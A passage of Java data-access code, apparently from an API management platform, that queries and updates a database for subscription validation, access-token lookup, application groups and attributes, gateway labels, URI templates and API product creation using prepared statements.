(!isAdvancedThrottleEnabled) { if (!defaultVersionInvoked) { ps.setString(3, version); } } else { ps.setInt(3, apiOwnerTenantId); if (!defaultVersionInvoked) { ps.setString(4, version); } } rs = ps.executeQuery(); if (rs.next()) { String subscriptionStatus = rs.getString("SUB_STATUS"); String type = rs.getString("KEY_TYPE"); if (APIConstants.SubscriptionStatus.BLOCKED.equals(subscriptionStatus)) { infoDTO.setValidationStatus(APIConstants.KeyValidationStatus.API_BLOCKED); infoDTO.setAuthorized(false); return infoDTO; } else if (APIConstants.SubscriptionStatus.ON_HOLD.equals(subscriptionStatus) || APIConstants.SubscriptionStatus.REJECTED.equals(subscriptionStatus)) { infoDTO.setValidationStatus( APIConstants.KeyValidationStatus.SUBSCRIPTION_INACTIVE); infoDTO.setAuthorized(false); return infoDTO; } else if (APIConstants.SubscriptionStatus.PROD_ONLY_BLOCKED .equals(subscriptionStatus) && !APIConstants.API_KEY_TYPE_SANDBOX.equals(type)) { infoDTO.setValidationStatus(APIConstants.KeyValidationStatus.API_BLOCKED); infoDTO.setType(type); infoDTO.setAuthorized(false); return infoDTO; } String tokenType = rs.getString("TOKEN_TYPE"); if (APIConstants.JWT.equals(tokenType)) { infoDTO.setAuthorized(false); return infoDTO; } final String API_PROVIDER = rs.getString("API_PROVIDER"); final String SUB_TIER = rs.getString("TIER_ID"); final String APP_TIER = rs.getString("APPLICATION_TIER"); infoDTO.setTier(SUB_TIER); infoDTO.setSubscriber(rs.getString("USER_ID")); infoDTO.setApplicationId(rs.getString("APPLICATION_ID")); infoDTO.setApiName(rs.getString("API_NAME")); infoDTO.setApiPublisher(API_PROVIDER); infoDTO.setApplicationName(rs.getString("NAME")); infoDTO.setApplicationTier(APP_TIER); infoDTO.setType(type); //Advanced Level Throttling Related Properties if (APIUtil.isAdvanceThrottlingEnabled()) { String apiTier = rs.getString("API_TIER"); String subscriberUserId = rs.getString("USER_ID"); String subscriberTenant = MultitenantUtils.getTenantDomain(subscriberUserId); int apiId = rs.getInt("API_ID"); int subscriberTenantId = APIUtil.getTenantId(subscriberUserId); int apiTenantId = APIUtil.getTenantId(API_PROVIDER); //TODO isContentAware boolean isContentAware = isAnyPolicyContentAware(conn, apiTier, APP_TIER, SUB_TIER, subscriberTenantId, apiTenantId, apiId); infoDTO.setContentAware(isContentAware); //TODO this must implement as a part of throttling implementation. int spikeArrest = 0; String apiLevelThrottlingKey = "api_level_throttling_key"; if (rs.getInt("RATE_LIMIT_COUNT") > 0) { spikeArrest = rs.getInt("RATE_LIMIT_COUNT"); } String spikeArrestUnit = null; if (rs.getString("RATE_LIMIT_TIME_UNIT") != null) { spikeArrestUnit = rs.getString("RATE_LIMIT_TIME_UNIT"); } boolean stopOnQuotaReach = rs.getBoolean("STOP_ON_QUOTA_REACH"); List<String> list = new ArrayList<String>(); list.add(apiLevelThrottlingKey); infoDTO.setSpikeArrestLimit(spikeArrest); infoDTO.setSpikeArrestUnit(spikeArrestUnit); infoDTO.setStopOnQuotaReach(stopOnQuotaReach); infoDTO.setSubscriberTenantDomain(subscriberTenant); if (apiTier != null && apiTier.trim().length() > 0) { infoDTO.setApiTier(apiTier); } //We also need to set throttling data list associated with given API. This need to have policy id and // condition id list for all throttling tiers associated with this API. 
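                    // At the moment the list only carries the api_level_throttling_key placeholder defined above.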
infoDTO.setThrottlingDataList(list); } infoDTO.setAuthorized(true); return infoDTO; } infoDTO.setAuthorized(false); infoDTO.setValidationStatus( APIConstants.KeyValidationStatus.API_AUTH_RESOURCE_FORBIDDEN); } catch (SQLException e) { handleException("Exception occurred while validating Subscription.", e); } finally { try { conn.setAutoCommit(false); } catch (SQLException e) { log.error("Error occurred while fetching data: " + e.getMessage(), e); } APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return infoDTO; } /** * Returns a Prepared statement after setting all the dynamic parameters. Dynamic parameters will be added in * the place of $params in query string * * @param conn connection which will be used to create a prepared statement * @param query dynamic query string which will be modified. * @param params list of parameters * @param startingParamIndex index from which the parameter numbering will start. * @return * @throws SQLException */ public PreparedStatement fillQueryParams(Connection conn, String query, String params[], int startingParamIndex) throws SQLException { String paramString = ""; for (int i = 1; i <= params.length; i++) { if (i == params.length) { paramString = paramString + "?"; } else { paramString = paramString + "?,"; } } query = query.replace("$params", paramString); if (log.isDebugEnabled()) { log.info("Prepared statement query :" + query); } PreparedStatement preparedStatement = conn.prepareStatement(query); for (int i = 0; i < params.length; i++) { preparedStatement.setString(startingParamIndex, params[i]); startingParamIndex++; } return preparedStatement; } /** * Returns True if AM_APPLICATION_GROUP_MAPPING table exist in AM DB * * @return */ public boolean isGrpIdMappingTableExist() { String sql = "SELECT * FROM AM_APPLICATION_GROUP_MAPPING"; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sql); rs = ps.executeQuery(); } catch (SQLException e) { log.info("AM_APPLICATION_GROUP_MAPPING :- " + e.getMessage(), e); return false; } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return true; } /** * Adds a new record in AM_APPLICATION_GROUP_MAPPING for each group * * @param conn * @param applicationId * @param groupIdString group id values separated by commas * @return * @throws APIManagementException */ private boolean updateGroupIDMappings(Connection conn, int applicationId, String groupIdString, String tenant) throws APIManagementException { boolean updateSuccessful = false; PreparedStatement removeMigratedGroupIdsStatement = null; PreparedStatement deleteStatement = null; PreparedStatement insertStatement = null; String deleteQuery = SQLConstants.REMOVE_GROUP_ID_MAPPING_SQL; String insertQuery = SQLConstants.ADD_GROUP_ID_MAPPING_SQL; try { // Remove migrated Group ID information so that it can be replaced by updated Group ID's that are now // being saved. 
This is done to ensure that there is no conflicting migrated Group ID data remaining removeMigratedGroupIdsStatement = conn.prepareStatement(SQLConstants.REMOVE_MIGRATED_GROUP_ID_SQL); removeMigratedGroupIdsStatement.setInt(1, applicationId); removeMigratedGroupIdsStatement.executeUpdate(); deleteStatement = conn.prepareStatement(deleteQuery); deleteStatement.setInt(1, applicationId); deleteStatement.executeUpdate(); if (!StringUtils.isEmpty(groupIdString)) { String[] groupIdArray = groupIdString.split(","); insertStatement = conn.prepareStatement(insertQuery); for (String group : groupIdArray) { insertStatement.setInt(1, applicationId); insertStatement.setString(2, group); insertStatement.setString(3, tenant); insertStatement.addBatch(); } insertStatement.executeBatch(); } updateSuccessful = true; } catch (SQLException e) { updateSuccessful = false; handleException("Failed to update GroupId mappings ", e); } finally { APIMgtDBUtil.closeAllConnections(removeMigratedGroupIdsStatement, null, null); APIMgtDBUtil.closeAllConnections(deleteStatement, null, null); APIMgtDBUtil.closeAllConnections(insertStatement, null, null); } return updateSuccessful; } /** * Fetches all the groups for a given application and creates a single string separated by comma * * @param applicationId * @return comma separated group Id String * @throws APIManagementException */ public String getGroupId(int applicationId) throws APIManagementException { String grpId = ""; ArrayList<String> grpIdList = new ArrayList<String>(); PreparedStatement preparedStatement = null; Connection conn = null; ResultSet resultSet = null; String sqlQuery = SQLConstants.GET_GROUP_ID_SQL; try { conn = APIMgtDBUtil.getConnection(); preparedStatement = conn.prepareStatement(sqlQuery); preparedStatement.setInt(1, applicationId); resultSet = preparedStatement.executeQuery(); while (resultSet.next()) { grpIdList.add(resultSet.getString("GROUP_ID")); } for (int i = 0; i < grpIdList.size(); i++) { if (i == grpIdList.size() - 1) { grpId = grpId + grpIdList.get(i); } else { grpId = grpId + grpIdList.get(i) + ","; } } } catch (SQLException e) { handleException("Failed to Retrieve GroupId for application " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, conn, resultSet); } return grpId; } /** * Get access token information associated with the given consumer key. * * @param consumerKey The consumer key. * @return APIKey The access token information. 
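     * <p>A minimal usage sketch (assuming {@code dao} is an instance of this DAO):
     * <pre>{@code
     * APIKey key = dao.getAccessTokenInfoByConsumerKey(consumerKey);
     * // key is null when no application-type token exists for the consumer key
     * }</pre>
     * @throws APIManagementException if the owner of the consumer key cannot be resolved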
* @throws SQLException * @throws CryptoException */ public APIKey getAccessTokenInfoByConsumerKey(String consumerKey) throws SQLException, CryptoException, APIManagementException { String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; String username = getUserIdFromConsumerKey(consumerKey); accessTokenStoreTable = getAccessTokenStoreTableNameOfUserId(username, accessTokenStoreTable); Connection connection = null; PreparedStatement preparedStatement = null; ResultSet resultSet = null; String statement = SQLConstants.GET_ACCESS_TOKEN_INFO_BY_CONSUMER_KEY_PREFIX + accessTokenStoreTable + SQLConstants.GET_ACCESS_TOKEN_INFO_BY_CONSUMER_KEY_SUFFIX; String oracleSQL = SQLConstants.GET_ACCESS_TOKEN_INFO_BY_CONSUMER_KEY_ORACLE_PREFIX + accessTokenStoreTable + SQLConstants.GET_ACCESS_TOKEN_INFO_BY_CONSUMER_KEY_ORACLE_SUFFIX; String mySQL = "SELECT" + statement; String db2SQL = "SELECT" + statement; String msSQL = "SELECT " + statement; String postgreSQL = "SELECT * FROM (SELECT" + statement + ") AS TOKEN"; String accessToken; String sql; try { connection = APIMgtDBUtil.getConnection(); if (connection.getMetaData().getDriverName().contains("MySQL") || connection.getMetaData().getDriverName ().contains("H2")) { sql = mySQL; } else if (connection.getMetaData().getDatabaseProductName().contains("DB2")) { sql = db2SQL; } else if (connection.getMetaData().getDriverName().contains("MS SQL") || connection.getMetaData() .getDriverName().contains("Microsoft")) { sql = msSQL; } else if (connection.getMetaData().getDriverName().contains("PostgreSQL")) { sql = postgreSQL; } else { sql = oracleSQL; } preparedStatement = connection.prepareStatement(sql); preparedStatement.setString(1, consumerKey); preparedStatement.setString(2, APIConstants.ACCESS_TOKEN_USER_TYPE_APPLICATION); resultSet = preparedStatement.executeQuery(); if (resultSet.next()) { APIKey apiKey = new APIKey(); accessToken = APIUtil.decryptToken(resultSet.getString("ACCESS_TOKEN")); apiKey.setConsumerKey(consumerKey); String consumerSecret = resultSet.getString("CONSUMER_SECRET"); apiKey.setConsumerSecret(APIUtil.decryptToken(consumerSecret)); apiKey.setAccessToken(accessToken); apiKey.setValidityPeriod(resultSet.getLong("VALIDITY_PERIOD") / 1000); apiKey.setGrantTypes(resultSet.getString("GRANT_TYPES")); apiKey.setCallbackUrl(resultSet.getString("CALLBACK_URL")); // Load all the rows to in memory and build the scope string List<String> scopes = new ArrayList<String>(); String tokenString = resultSet.getString("ACCESS_TOKEN"); do { String currentRowTokenString = resultSet.getString("ACCESS_TOKEN"); if (tokenString.equals(currentRowTokenString)) { scopes.add(resultSet.getString(APIConstants.IDENTITY_OAUTH2_FIELD_TOKEN_SCOPE)); } } while (resultSet.next()); apiKey.setTokenScope(getScopeString(scopes)); return apiKey; } return null; } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, connection, resultSet); } } /** * Returns the user id for the consumer key. * * @param consumerKey The consumer key. * @return String The user id. 
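     * @throws APIManagementException if a database error occurs while looking up the user id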
*/ private String getUserIdFromConsumerKey(String consumerKey) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String userId = null; String sqlQuery = SQLConstants.GET_USER_ID_FROM_CONSUMER_KEY_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, consumerKey); rs = prepStmt.executeQuery(); while (rs.next()) { userId = rs.getString("USER_ID"); } } catch (SQLException e) { handleException("Error when getting the user id for Consumer Key" + consumerKey, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return userId; } /** * Get Subscribed APIs for an App. * * @param applicationName id of the application name * @return APISubscriptionInfoDTO[] * @throws APIManagementException if failed to get Subscribed APIs */ public APISubscriptionInfoDTO[] getSubscribedAPIsForAnApp(String userId, String applicationName) throws APIManagementException { List<APISubscriptionInfoDTO> apiSubscriptionInfoDTOS = new ArrayList<APISubscriptionInfoDTO>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; //identify logged in user String loginUserName = getLoginUserName(userId); int tenantId = APIUtil.getTenantId(loginUserName); String sqlQuery = SQLConstants.GET_SUBSCRIBED_APIS_OF_USER_BY_APP_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIBED_APIS_OF_USER_BY_APP_CASE_INSENSITIVE_SQL; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, tenantId); ps.setString(2, applicationName); rs = ps.executeQuery(); while (rs.next()) { APISubscriptionInfoDTO infoDTO = new APISubscriptionInfoDTO(); infoDTO.setProviderId(APIUtil.replaceEmailDomain(rs.getString("API_PROVIDER"))); infoDTO.setApiName(rs.getString("API_NAME")); infoDTO.setContext(rs.getString("API_CONTEXT")); infoDTO.setVersion(rs.getString("API_VERSION")); infoDTO.setSubscriptionTier(rs.getString("SP_TIER_ID")); apiSubscriptionInfoDTOS.add(infoDTO); } } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return apiSubscriptionInfoDTOS.toArray(new APISubscriptionInfoDTO[apiSubscriptionInfoDTOS.size()]); } public Application getApplicationByClientId(String clientId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application application = null; try { connection = APIMgtDBUtil.getConnection(); String query = SQLConstants.GET_APPLICATION_BY_CLIENT_ID_SQL; prepStmt = connection.prepareStatement(query); prepStmt.setString(1, clientId); rs = prepStmt.executeQuery(); if (rs.next()) { String applicationId = rs.getString("APPLICATION_ID"); String applicationName = rs.getString("NAME"); String applicationOwner = rs.getString("CREATED_BY"); application = new Application(applicationId); application.setName(applicationName); application.setOwner(applicationOwner); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); application.setId(rs.getInt("APPLICATION_ID")); application.setGroupId(rs.getString("GROUP_ID")); application.setUUID(rs.getString("UUID")); application.setTier(rs.getString("APPLICATION_TIER")); application.setTokenType(rs.getString("TOKEN_TYPE")); application.setKeyType(rs.getString("KEY_TYPE")); if (multiGroupAppSharingEnabled) { 
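                    // The application row itself may not carry a group id; fall back to the mappings returned by getGroupId().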
if (application.getGroupId() == null || application.getGroupId().isEmpty()) { application.setGroupId(getGroupId(application.getId())); } } } } catch (SQLException e) { handleException("Error while obtaining details of the Application foe client id " + clientId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return application; } /** * Returns the Label List for the TenantId. * * @param tenantDomain The tenant domain. * @return List of labels. */ public List<Label> getAllLabels(String tenantDomain) throws APIManagementException { List<Label> labelList = new ArrayList<>(); try (Connection connection = APIMgtDBUtil.getConnection(); PreparedStatement statement = connection.prepareStatement(SQLConstants.GET_LABEL_BY_TENANT)) { try { connection.setAutoCommit(false); statement.setString(1, tenantDomain); try (ResultSet rs = statement.executeQuery()) { while (rs.next()) { String labelId = rs.getString("LABEL_ID"); String labelName = rs.getString("NAME"); String description = rs.getString("DESCRIPTION"); Label label = new Label(); label.setLabelId(labelId); label.setName(labelName); label.setDescription(description); label.setAccessUrls(getAccessUrlList(connection, labelId)); labelList.add(label); } } connection.commit(); } catch (SQLException e) { connection.rollback(); handleException("Failed to get Labels of " + tenantDomain, e); } finally { connection.setAutoCommit(true); } } catch (SQLException e) { handleException("Failed to get Labels of " + tenantDomain, e); } return labelList; } /** * Returns the URL list for label id. * * @param labelId label id. * @return List of string. */ private List<String> getAccessUrlList(Connection connection, String labelId) throws APIManagementException { List<String> hostList = new ArrayList<>(); try (PreparedStatement statement = connection.prepareStatement(SQLConstants.GET_URL_BY_LABEL_ID)) { statement.setString(1, labelId); try (ResultSet rs = statement.executeQuery()) { while (rs.next()) { String host = rs.getString("ACCESS_URL"); hostList.add(host); } } } catch (SQLException e) { handleException("Failed to get label list: " , e); } return hostList; } /** * Returns the Label. * * @param tenantDomain The tenant domain. * @param label label object. * @return label. */ public Label addLabel(String tenantDomain, Label label) throws APIManagementException { String uuid = UUID.randomUUID().toString(); label.setLabelId(uuid); try (Connection connection = APIMgtDBUtil.getConnection(); PreparedStatement statement = connection.prepareStatement(SQLConstants.ADD_LABEL_SQL)) { try { initialAutoCommit = connection.getAutoCommit(); connection.setAutoCommit(false); statement.setString(1, uuid); statement.setString(2, label.getName()); statement.setString(3, label.getDescription()); statement.setString(4, tenantDomain); statement.executeUpdate(); if (!label.getAccessUrls().isEmpty()) { insertAccessUrlMappings(connection, uuid, label.getAccessUrls()); } connection.commit(); } catch (SQLException e) { connection.rollback(); handleException("Failed to add label: " + uuid, e); } finally { APIMgtDBUtil.setAutoCommit(connection, initialAutoCommit); } } catch (SQLException e) { handleException("Failed to add label: " + uuid, e); } return label; } /** * Insert URL to the URL table * * @param uuid label id. * @param urlList The list of url. 
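     * @param connection open database connection; the caller is responsible for commit and rollback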
* @throws APIManagementException */ private void insertAccessUrlMappings(Connection connection, String uuid, List<String> urlList) throws APIManagementException { try (PreparedStatement statement = connection.prepareStatement(SQLConstants.ADD_LABEL_URL_MAPPING_SQL)) { for (String accessUrl : urlList) { statement.setString(1, uuid); statement.setString(2, accessUrl); statement.addBatch(); } statement.executeBatch(); } catch (SQLException e) { handleException("Failed to add label url : " + uuid, e); } } /** * Delete label. * * @param labelUUID label id. * @throws APIManagementException */ public void deleteLabel(String labelUUID) throws APIManagementException { try (Connection connection = APIMgtDBUtil.getConnection(); PreparedStatement statement = connection.prepareStatement(SQLConstants.DELETE_LABEL_SQL)) { try { initialAutoCommit = connection.getAutoCommit(); connection.setAutoCommit(false); statement.setString(1, labelUUID); statement.executeUpdate(); connection.commit(); } catch (SQLException e) { connection.rollback(); handleException("Failed to delete label : " + labelUUID, e); } finally { APIMgtDBUtil.setAutoCommit(connection, initialAutoCommit); } } catch (SQLException e) { handleException("Failed to delete label : " + labelUUID, e); } } /** * Delete label URL * * @param labelUUID label id. * @throws APIManagementException */ private void deleteAccessUrlMappings(Connection connection, String labelUUID) throws APIManagementException { try (PreparedStatement statement = connection.prepareStatement(SQLConstants.DELETE_LABEL_URL_MAPPING_SQL)) { statement.setString(1, labelUUID); statement.executeUpdate(); } catch (SQLException e) { handleException("Failed to delete label url : ", e); } } /** * Update the label. * * @param label label object. * @return labels. 
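     * <p>A minimal usage sketch (assuming {@code dao} is an instance of this DAO and the label id refers to an
     * already persisted label):
     * <pre>{@code
     * Label label = new Label();
     * label.setLabelId(existingLabelId);   // id of an already persisted label
     * label.setName("internal-gateway");
     * label.setDescription("Label for internal gateway environments");
     * label.setAccessUrls(Arrays.asList("https://internal.gw.example.com"));
     * dao.updateLabel(label);
     * }</pre>
     * @throws APIManagementException if the label or its access URL mappings cannot be updated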
*/ public Label updateLabel(Label label) throws APIManagementException { List<String> accessURLs = label.getAccessUrls(); try (Connection connection = APIMgtDBUtil.getConnection(); PreparedStatement statement = connection.prepareStatement(SQLConstants.UPDATE_LABEL_SQL)) { try { initialAutoCommit = connection.getAutoCommit(); connection.setAutoCommit(false); statement.setString(1, label.getName()); statement.setString(2, label.getDescription()); statement.setString(3, label.getLabelId()); deleteAccessUrlMappings(connection, label.getLabelId()); insertAccessUrlMappings(connection, label.getLabelId(), accessURLs); statement.executeUpdate(); connection.commit(); } catch (SQLException e) { connection.rollback(); handleException("Failed to update label : ", e); } finally { APIMgtDBUtil.setAutoCommit(connection, initialAutoCommit); } } catch (SQLException e) { handleException("Failed to update label : ", e); } return label; } private void addApplicationAttributes(Connection conn, Map<String, String> attributes, int applicationId, int tenantId) throws APIManagementException { PreparedStatement ps = null; ResultSet rs = null; try { if(attributes != null) { ps = conn.prepareStatement(SQLConstants.ADD_APPLICATION_ATTRIBUTES_SQL); for (String key : attributes.keySet()) { ps.setInt(1, applicationId); ps.setString(2, key); ps.setString(3, attributes.get(key)); ps.setInt(4, tenantId); ps.addBatch(); } int[] update = ps.executeBatch(); } } catch (SQLException e) { handleException("Error in adding attributes of application with id: " + applicationId , e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); } } /** * Get all attributes stored against an Application * * @param conn Database connection * @param applicationId * @throws APIManagementException */ public Map<String, String> getApplicationAttributes(Connection conn, int applicationId) throws APIManagementException { PreparedStatement ps = null; ResultSet rs = null; Map<String, String> applicationAttributes = new HashMap<>(); try { ps = conn.prepareStatement(SQLConstants.GET_APPLICATION_ATTRIBUTES_BY_APPLICATION_ID); ps.setInt(1, applicationId); rs = ps.executeQuery(); while (rs.next()) { applicationAttributes.put(rs.getString("NAME"), rs.getString("VALUE")); } } catch (SQLException e) { handleException("Error when reading attributes of application with id: " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); } return applicationAttributes; } /** * Delete certain attribute stored against an Application * * @param attributeKey User defined key of attribute * @param applicationId * @throws APIManagementException */ public void deleteApplicationAttributes(String attributeKey, int applicationId) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); ps = connection.prepareStatement(SQLConstants.REMOVE_APPLICATION_ATTRIBUTES_BY_ATTRIBUTE_NAME_SQL); ps.setString(1, attributeKey); ps.setInt(2, applicationId); ps.execute(); connection.commit(); } catch (SQLException e) { handleException("Error in establishing SQL connection ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, null); } } /** * Add new attributes against an Application in API Store * * @param applicationAttributes Map of key, value pair of attributes * @param applicationId Id of Application against which attributes are getting stored * @param tenantId Id of tenant * @throws APIManagementException */ public void 
addApplicationAttributes(Map<String, String> applicationAttributes, int applicationId, int tenantId) throws APIManagementException { Connection connection = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); addApplicationAttributes(connection, applicationAttributes, applicationId, tenantId); connection.commit(); } catch (SQLException sqlException) { if (connection != null) { try { connection.rollback(); } catch (SQLException e) { log.error("Failed to rollback add application attributes ", e); } } handleException("Failed to add Application", sqlException); } finally { APIMgtDBUtil.closeAllConnections(null, connection, null); } } /** * Converts all null values for THROTTLING_TIER in AM_API_URL_MAPPING table, to Unlimited. * This will be executed only during startup of the server. * * @throws APIManagementException */ public void convertNullThrottlingTiers() throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; String query = SQLConstants.FIX_NULL_THROTTLING_TIERS; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(query); prepStmt.execute(); connection.commit(); } catch (SQLException e) { handleException( "Error occurred while converting NULL throttling tiers to Unlimited in AM_API_URL_MAPPING table", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } /** * Retrieves the Application which is corresponding to the given UUID String * * @param subscriberId subscriberId of the Application * @param applicationName name of the Application * @return * @throws APIManagementException */ public Application getApplicationBySubscriberIdAndName(int subscriberId, String applicationName) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; int applicationId = 0; Application application = null; try { connection = APIMgtDBUtil.getConnection(); String query = SQLConstants.GET_APPLICATION_BY_SUBSCRIBERID_AND_NAME_SQL; prepStmt = connection.prepareStatement(query); prepStmt.setInt(1, subscriberId); prepStmt.setString(2, applicationName); rs = prepStmt.executeQuery(); if (rs.next()) { String subscriberName = rs.getString("USER_ID"); Subscriber subscriber = new Subscriber(subscriberName); subscriber.setId(subscriberId); application = new Application(applicationName, subscriber); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); applicationId = rs.getInt("APPLICATION_ID"); application.setId(applicationId); application.setGroupId(rs.getString("GROUP_ID")); application.setUUID(rs.getString("UUID")); application.setTier(rs.getString("APPLICATION_TIER")); application.setTokenType(rs.getString("TOKEN_TYPE")); subscriber.setId(rs.getInt("SUBSCRIBER_ID")); if (multiGroupAppSharingEnabled) { if (application.getGroupId().isEmpty()) { application.setGroupId(getGroupId(application.getId())); } } Timestamp createdTime = rs.getTimestamp("CREATED_TIME"); application.setCreatedTime(createdTime == null ? null : String.valueOf(createdTime.getTime())); try { Timestamp updated_time = rs.getTimestamp("UPDATED_TIME"); application.setLastUpdatedTime( updated_time == null ? 
null : String.valueOf(updated_time.getTime())); } catch (SQLException e) { application.setLastUpdatedTime(application.getCreatedTime()); } } if (application != null) { Map<String, String> applicationAttributes = getApplicationAttributes(connection, applicationId); application.setApplicationAttributes(applicationAttributes); } } catch (SQLException e) { handleException("Error while obtaining details of the Application : " + applicationName + " of " + subscriberId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return application; } /** * Retrieve URI Templates for the given API * @param api API * @return Map of URITemplate with key as Method:resourcepath * @throws APIManagementException exception */ public Map<String, URITemplate> getURITemplatesForAPI(API api) throws APIManagementException { Map<String, URITemplate> templatesMap = new HashMap<String, URITemplate>(); Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; try { connection = APIMgtDBUtil.getConnection(); //TODO move to constant String query = "SELECT URL_PATTERN , URL_MAPPING_ID, HTTP_METHOD FROM AM_API API , AM_API_URL_MAPPING URL " + "WHERE API.API_ID = URL.API_ID AND API.API_NAME =? " + "AND API.API_VERSION=? AND API.API_PROVIDER=?"; prepStmt = connection.prepareStatement(query); prepStmt.setString(1, api.getId().getApiName()); prepStmt.setString(2, api.getId().getVersion()); prepStmt.setString(3, api.getId().getProviderName()); rs = prepStmt.executeQuery(); while (rs.next()) { URITemplate template = new URITemplate(); String urlPattern = rs.getString("URL_PATTERN"); String httpMethod = rs.getString("HTTP_METHOD"); template.setHTTPVerb(httpMethod); template.setResourceURI(urlPattern); template.setId(rs.getInt("URL_MAPPING_ID")); //TODO populate others if needed templatesMap.put(httpMethod + ":" + urlPattern, template); } } catch (SQLException e) { handleException("Error while obtaining details of the URI Template for api " + api.getId() , e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return templatesMap; } public void addAPIProduct(APIProduct apiproduct, String tenantDomain) throws APIManagementException { Connection connection = null; PreparedStatement prepStmtAddAPIProduct = null; PreparedStatement prepStmtAddResourceMapping = null; PreparedStatement prepStmtAddScopeEntry = null; PreparedStatement prepStmtAddScopeLink = null; PreparedStatement prepStmtAddScopeResourceMapping = null; ResultSet rs = null; int productId = 0; int scopeId = 0; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); //TODO move to constant :version? 
String queryAddAPIProduct = "INSERT INTO " + "AM_API_PRODUCT(API_PRODUCT_PROVIDER,API_PRODUCT_NAME," + "DESCRIPTION, API_PRODUCT_TIER,CREATED_BY," + "VISIBILITY,SUBSCRIPTION_AVAILABILITY,UUID,TENANT_DOMAIN,STATE,API_PRODUCT_VERSION) " + "VALUES (?,?,?,?,?,?,?,?,?,?,?)"; prepStmtAddAPIProduct = connection.prepareStatement(queryAddAPIProduct, new String[]{"api_product_id"}); prepStmtAddAPIProduct.setString(1, apiproduct.getProvider()); prepStmtAddAPIProduct.setString(2, apiproduct.getName()); prepStmtAddAPIProduct.setString(3, apiproduct.getDescription()); prepStmtAddAPIProduct.setString(4, apiproduct.getProductTier()); prepStmtAddAPIProduct.setString(5, apiproduct.getProvider()); //TODO get the created user prepStmtAddAPIProduct.setString(6, apiproduct.getVisibility()); prepStmtAddAPIProduct.setString(7, apiproduct.getSubscriptionAvailability()); prepStmtAddAPIProduct.setString(8, apiproduct.getUuid()); prepStmtAddAPIProduct.setString(9, tenantDomain); prepStmtAddAPIProduct.setString(10, apiproduct.getState() == null? "CREATED" : apiproduct.getState()); //TODO move to constant prepStmtAddAPIProduct.setString(11, "0"); //TODO move to constant prepStmtAddAPIProduct.execute(); rs = prepStmtAddAPIProduct.getGeneratedKeys(); if (rs.next()) { productId = rs.getInt(1); } //breaks the flow if product is not added to the db correctly if(productId == 0) { throw new APIManagementException("Error while adding API product " + apiproduct.getUuid()); } //add product scope //TODO finalize format and move to constants String productScopeKey = "productscope-" + apiproduct.getName() + ":" +apiproduct.getProvider(); //for now use key for display name as well TODO check and modify String productScopeDisplayName = productScopeKey; Scope productScope = new Scope(); productScope.setKey(productScopeKey); productScope.setName(productScopeDisplayName); String queryAddScopeEntry = SQLConstants.ADD_SCOPE_ENTRY_SQL; prepStmtAddScopeEntry = connection.prepareStatement(queryAddScopeEntry, new String[]{"scope_id"}); prepStmtAddScopeEntry.setString(1, productScope.getKey()); prepStmtAddScopeEntry.setString(2, productScope.getName()); prepStmtAddScopeEntry.setString(3, productScope.getDescription()); prepStmtAddScopeEntry.setInt(4, APIUtil.getTenantIdFromTenantDomain(tenantDomain)); prepStmtAddScopeEntry.execute(); rs = prepStmtAddScopeEntry.getGeneratedKeys(); if (rs.next()){ scopeId = rs.getInt(1); } //breaks the flow if product scope is not added to the db correctly if (scopeId == 0) { throw new APIManagementException("Error while adding scope for API product : " + apiproduct.getUuid()); } productScope.setId(scopeId); //add scope - api mapping String scopeLink = SQLConstants.ADD_SCOPE_LINK_SQL; prepStmtAddScopeLink = connection.prepareStatement(scopeLink); //TODO move to constant String queryAddResourceMapping = "INSERT INTO AM_API_PRODUCT_MAPPING (API_PRODUCT_ID,URL_MAPPING_ID) " + "VALUES (?, ?)"; prepStmtAddResourceMapping = connection.prepareStatement(queryAddResourceMapping); String queryAddScopeResourceMapping = SQLConstants.ADD_OAUTH2_RESOURCE_SCOPE_SQL; prepStmtAddScopeResourceMapping = connection.prepareStatement(queryAddScopeResourceMapping); //add the resources in each API in the API product. 
